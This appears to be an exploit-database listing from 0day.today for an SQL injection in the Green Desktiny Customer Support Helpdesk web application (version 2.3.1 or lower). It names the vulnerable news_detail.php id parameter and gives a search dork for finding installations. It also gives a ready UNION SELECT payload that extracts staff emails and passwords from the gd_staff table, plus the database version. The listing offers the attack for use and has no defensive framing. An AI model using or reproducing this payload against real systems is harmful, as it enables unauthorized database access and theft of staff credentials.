Green Desktiny - Customer Support Helpdesk SQL injection vulnerability

2009-12-26T00:00:00
ID 1337DAY-ID-10409
Type zdt
Reporter kaMtiEz
Modified 2009-12-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
Green Desktiny - Customer Support Helpdesk SQL injection vulnerability
======================================================================

###################################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.greendesktiny.com/
[+] Download : -
[+] version : 2.3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : $68           
[+] Location : INDONESIA - JOGJA
 
##################################################################################
 
 
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/news_detail.php?id=[INDONESIANCODER]
 
[ Exploit ]
 
-666/**/union/**/select/**/666,666,666,666,666,666,666,666,666,concat_ws(0x3a,email,password),@@version,666/**/from/**/gd_staff--
 
 
===========================================================================



#  0day.today [2018-04-13]  #